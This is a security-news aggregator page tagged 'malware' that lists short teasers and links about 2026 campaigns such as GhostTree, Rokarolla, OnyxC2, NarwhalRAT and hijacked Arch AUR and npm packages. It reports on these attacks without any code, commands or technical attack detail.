Tag: malware
-
GhostTree Attack Abused Recursive Windows Junctions to Hide Malware
GhostTree uses recursive NTFS junctions to generate vast numbers of valid Windows file paths. Varonis explains how the technique could cause Microsoft Defender folder scans to never complete, leaving malware undetected. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/ghosttree-attack-abused-recursive-windows-junctions-to-hide-malware/
-
‘Lorem Ipsum’ Malware Pivots to ClickFix Delivery
New analysis shows the campaign, which uses compromised WordPress sites, may be linked to the ransomware and data extortion group Vice Society. First seen on darkreading.com Jump to article: www.darkreading.com/cyberattacks-data-breaches/lorem-ipsum-malware-clickfix-delivery
-
New Rokarolla Android Malware Steals PINs, SMS Codes, and Crypto Wallet Funds
Security researchers at Zimperium’s zLabs have documented a new Android banking trojan, Rokarolla, that targets 217 banking and cryptocurrency apps and packs 137 remote commands.Together, they give an operator near-total control of an infected phone: it lifts lock-screen PINs, reads and sends SMS, rewrites the clipboard to redirect crypto payments, and switches off Google Play…
-
New Rokarolla Android Malware Steals PINs, SMS Codes, and Crypto Wallet Funds
Security researchers at Zimperium’s zLabs have documented a new Android banking trojan, Rokarolla, that targets 217 banking and cryptocurrency apps and packs 137 remote commands.Together, they give an operator near-total control of an infected phone: it lifts lock-screen PINs, reads and sends SMS, rewrites the clipboard to redirect crypto payments, and switches off Google Play…
-
Mit Malware erbeutet: 124 Millionen neue Passwörter bei HaveIBeenPwned
Cyberkriminelle greifen mit Infostealer-Malware häufig Zugangsdaten ab. HaveIBeenPwned hat seine Datenbank um eine große Sammlung davon erweitert. First seen on golem.de Jump to article: www.golem.de/news/mit-malware-erbeutet-124-millionen-neue-passwoerter-bei-haveibeenpwned-2606-209825.html
-
Ransomware gang abuses Microsoft Teams relays to hide malicious traffic
DragonForce ransomware used a custom malware named ‘Backdoor.Turn’ to hide command-and-control traffic inside Microsoft Teams relay infrastructure. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/ransomware-gang-abuses-microsoft-teams-relays-to-hide-malicious-traffic/
-
Windows version of SprySOCKS Linux malware used to attack govt orgs
Windows variants for the SprySOCKS Linux malware have been used in attacks targeting government organizations in at least four countries. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/windows-version-of-sprysocks-linux-malware-used-to-attack-govt-orgs/
-
Fake Microsoft Alerts Used to Deploy North Korean NarwhalRAT Malware
The North Korean state-sponsored hacking group known as ScarCruft (aka APT37) has been observed using spear-phishing messages impersonating Microsoft Account security notifications to deliver malware called NarwhalRAT.”The attack email contained a message impersonating an MS account security alert,” the Genians Security Center (GSC) said. “It was designed to create concern over possible First seen on…
-
China-linked group uses InfiniteRed malware to target medical research institutions
First seen on scworld.com Jump to article: www.scworld.com/brief/china-linked-group-uses-infinitered-malware-to-target-medical-research-institutions
-
New Argamal malware disguised as adult games targets users
Tags: malwareFirst seen on scworld.com Jump to article: www.scworld.com/brief/new-argamal-malware-disguised-as-adult-games-targets-users
-
Chinese hackers breached North American research institutions via REDCap servers
A China-linked cyber espionage operation targeted North American medical research institutions through compromised REDCap servers, using custom malware to gain persistent … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2026/06/15/chinese-hackers-redcap-medical-research-institutions-breach/
-
North Korean Hackers Are Turning Developer Tools Into Malware Delivery Channels
Cybersecurity researchers have flagged two malicious cyber campaigns that exhibit similarities with a persistent North Korean threat cluster known as Contagious Interview (aka Famous Chollima, HexagonalRodent, and Void Dokkaebi).According to a report published by Proofpoint, the threat actor has been found orchestrating phishing campaigns using developer role recruitment or code review themes First seen on…
-
Chinese hackers breach REDCap servers, steal medical research
A China-linked espionage campaign targeted exposed REDCap servers to deploy the InfiniteRed malware and steal sensitive data from a medical institution in North America. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/chinese-hackers-breach-redcap-servers-steal-medical-research/
-
Threat Actor Malware Platform Exposed Through Unlocked PHP Installer Page
A misconfigured PHP-based malware distribution platform has been exposed after a security researcher inadvertently gained administrative access via an unlocked installation page, highlighting critical operational security failures in the active threat actor’s infrastructure. The incident, documented on June 11, 2026, began with routine threat intelligence monitoring on X (formerly Twitter), where a suspicious software download…
-
Hackers Hide New Argamal Malware Inside Working Hentai Games
Kaspersky found Argamal malware hidden in hentai game installers, giving hackers remote access through working games shared on adult sites and torrents. First seen on hackread.com Jump to article: hackread.com/hackers-hide-argamal-malware-hentai-games/
-
Manipulierte Red-Hat-npm-Pakete verbreiten neue Malware
Das JFrog-Security-Research-Team hat eine neue Welle der Supply-Chain-Schadsoftware Shai-Hulud analysiert. Betroffen sind 96 manipulierte Paketversionen aus dem npm-Namensraum @redhat-cloud-services, einem von Red Hat selbst genutzten und damit vertrauenswürdigen Bereich. Die Angreifer haben dabei nicht etwa Typosquatting-Pakete platziert, sondern legitime, weit verbreitete Komponenten als Träger missbraucht. Im Schadcode selbst wird die Kampagne als ‘Miasma: The Spreading…
-
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 101
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter IronWorm: Shai-Hulud’s rustier cousin Trojanized ai-sdk-ollama Delivers Miasma, a Self-Replicating npm Worm via binding.gyp Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO Using AI Agents to Analyze Malware on REMnux The Miasma…
-
Siemens Desigo CC patch files falsely flagged as malware
First seen on scworld.com Jump to article: www.scworld.com/brief/siemens-desigo-cc-patch-files-falsely-flagged-as-malware
-
Over 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit
Attackers took over more than 400 packages in the Arch User Repository (AUR) this week and rewrote their build scripts to install a credential stealer on any machine that built them.The malware is a Rust binary built to harvest developer secrets. When it lands with root, it can also load an eBPF rootkit to hide…
-
400+ Arch Linux AUR Packages Hijacked to Install Rust Credential Stealer
Attackers took over more than 400 packages in the Arch User Repository (AUR) this week and rewrote their build scripts to install a credential stealer on any machine that built them.The malware is a Rust binary built to harvest developer secrets. When it lands with root, it can also load an eBPF rootkit to hide…
-
Atomic Arch Campaign Hijacks 20+ Linux AUR Packages to Deliver Malware
Over 20 Linux packages were compromised in the Atomic Arch campaign, which abuses AUR ownership transfers to drop rootkit-like malware. First seen on hackread.com Jump to article: hackread.com/atomic-arch-hijacks-linux-aur-packages-malware/
-
Over 400 Arch Linux packages compromised to push rootkit, infostealer
More than 400 packages in the Arch User Repository (AUR) are distributing a Linux rootkit and infostealer malware targeting credentials and access tokens. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/over-400-arch-linux-packages-compromised-to-push-rootkit-infostealer/
-
Hackers Use Typosquatted npm Packages to Target Web3 Projects and Crypto Wallet Operators
Hackers have been using typosquatting npm packages to weaponize the trust Web3 teams place in open-source dependencies, turning routine installs into a path for wallet theft, secret harvesting, and staged malware delivery. The campaign is especially dangerous because it blends familiar Ethereum and blockchain branding with postinstall and preinstall abuse, allowing malicious code to execute…
-
OnyxC2 Stealer Uses Cloudflare-Fronted C2 to Exfiltrate Browser Data and Credentials
A new commercial-grade information stealer, marketed as OnyxC2, surfaced on cybercrime forums in early 2026 and demonstrates how commodity malware is increasingly packaged as a full-service product. For $250 a month buyers receive a web-based control panel, a payload builder, tiered licensing, and even refund guarantees if a build is detected lowering the barrier for…
-
OnyxC2 Stealer Uses Cloudflare-Fronted C2 to Exfiltrate Browser Data and Credentials
A new commercial-grade information stealer, marketed as OnyxC2, surfaced on cybercrime forums in early 2026 and demonstrates how commodity malware is increasingly packaged as a full-service product. For $250 a month buyers receive a web-based control panel, a payload builder, tiered licensing, and even refund guarantees if a build is detected lowering the barrier for…
-
ThreatsDay Bulletin: Worm Code Leaked, AI Agent Phished, Claude Code Patch + 28 New Stories
It’s been one of those weeks. You expect the usual noise: recycled malware, sloppy attacks, another easy target getting hit. Instead, there’s a supply chain attack kit in a public repo, a $5,000-a-month RAT that clones browsers, and research showing AI agents can be tricked into leaking real credentials.The bigger problem is how polished this…
-
OnyxC2 Malware-as-a-Service Offers Enterprise-Grade Data Theft
OnyxC2 is a MaaS stealer targeting 210+ apps, using DLL sideloading, encrypted payloads, and remote access features to evade detection. OnyxC2 appeared on a cybercrime forum earlier this year and is sold as a subscription service: $250 per month for the standard build, $500 for the premium tier that includes HVNC, and $6,000 for an…
-
Fake Spotify Premium tutorials on TikTok and Instagram Reels spread malware
Cybercriminals are using TikTok and Instagram Reels videos to spread Vidar, an infostealer malware, through fake downloads for popular paid software, according to … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2026/06/11/vidar-infostealer-tiktok-instagram-reels-malware-campaigns/